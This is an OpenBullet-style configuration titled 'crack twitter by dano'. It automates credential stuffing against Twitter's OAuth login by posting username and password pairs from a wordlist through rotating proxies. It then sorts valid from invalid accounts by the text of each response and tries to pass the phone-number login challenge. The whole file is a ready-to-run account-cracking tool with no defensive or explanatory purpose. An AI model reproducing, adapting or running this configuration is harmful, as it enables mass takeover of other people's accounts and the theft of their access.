[SETTINGS]
{
  "Name": "crack twitter by dano",
  "SuggestedBots": 45,
  "MaxCPM": 0,
  "LastModified": "2021-09-12T08:38:22.5867152+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Mikano",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "walllllll",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://api.twitter.com/oauth/authorize" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.twitter.com" 
  HEADER "content-length: 314" 
  HEADER "cache-control: max-age=0" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "origin: https://api.twitter.com" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9S Build/RQ3A.210805.001.A1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "x-requested-with: com.tencent.ig" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-fetch-dest: document" 
  HEADER "referer: https://api.twitter.com/oauth" 
  HEADER "accept-encoding: gzip, deflate" 
  HEADER "accept-language: en-US,en;q=0.9,ar-EG;q=0.8,ar;q=0.7" 

PARSE "<SOURCE>" LR "input type=\"hidden\" value=\"" "\"" -> VAR "AT" 

REQUEST POST "https://api.twitter.com/oauth/authorize" 
  CONTENT "authenticity_token=<AT>&redirect_after_login=https%3A%2F%2Fapi.twitter.com%2Foauth%2Fauthorize%3Foauth_token%3DrOzXyQAAAAAA4RWYAAABe9j_7Ww&oauth_token=rOzXyQAAAAAA4RWYAAABe9j_7Ww&session%5Busername_or_email%5D=<USER>&session%5Bpassword%5D=<PASS>&ui_metrics=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.twitter.com" 
  HEADER "content-length: 314" 
  HEADER "cache-control: max-age=0" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "origin: https://api.twitter.com" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9S Build/RQ3A.210805.001.A1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "x-requested-with: com.tencent.ig" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-fetch-dest: document" 
  HEADER "referer: https://api.twitter.com/oauth" 
  HEADER "accept-encoding: gzip, deflate" 
  HEADER "accept-language: en-US,en;q=0.9,ar-EG;q=0.8,ar;q=0.7" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Your phone number ends in" 
  KEYCHAIN Failure OR 
    KEY "We could not verify your credentials" 
    KEY "The email and password you entered did not match our records" 
    KEY "We found more than one account with that phone number" 

PARSE "<SOURCE>" LR "input type=\"hidden\" name=\"challenge_id\" value=\"" "\"" -> VAR "CID" 

PARSE "<SOURCE>" LR "input type=\"hidden\" name=\"enc_user_id\" value=\"" "\"" -> VAR "EUI" 

REQUEST POST "https://api.twitter.com/account/login_challenge" 
  CONTENT "authenticity_token=<AT>&challenge_id=<CID>&enc_user_id=<EUI>&challenge_type=RetypePhoneNumber&platform=web&redirect_after_login=https%3A%2F%2Fapi.twitter.com%2Foauth%2Fauthorize%3Foauth_token%3D4hY0KgAAAAAA4RWYAAABe9kXghY&remember_me=&challenge_response=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.twitter.com" 
  HEADER "content-length: 405" 
  HEADER "cache-control: max-age=0" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "origin: https://api.twitter.com" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9S Build/RQ3A.210805.001.A1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "x-requested-with: com.tencent.ig" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-fetch-dest: document" 
  HEADER "referer: https://api.twitter.com/account/login_challenge?platform=web&enc_user_id=<EUI>&challenge_type=RetypePhoneNumber&challenge_id=<CID>&redirect_after_login_verification=https%3A%2F%2Fapi.twitter.com%2Foauth%2Fauthorize%3Foauth_token%3D4hY0KgAAAAAA4RWYAAABe9kXghY" 
  HEADER "accept-encoding: gzip, deflate" 
  HEADER "accept-language: en-US,en;q=0.9,ar-EG;q=0.8,ar;q=0.7" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "" 

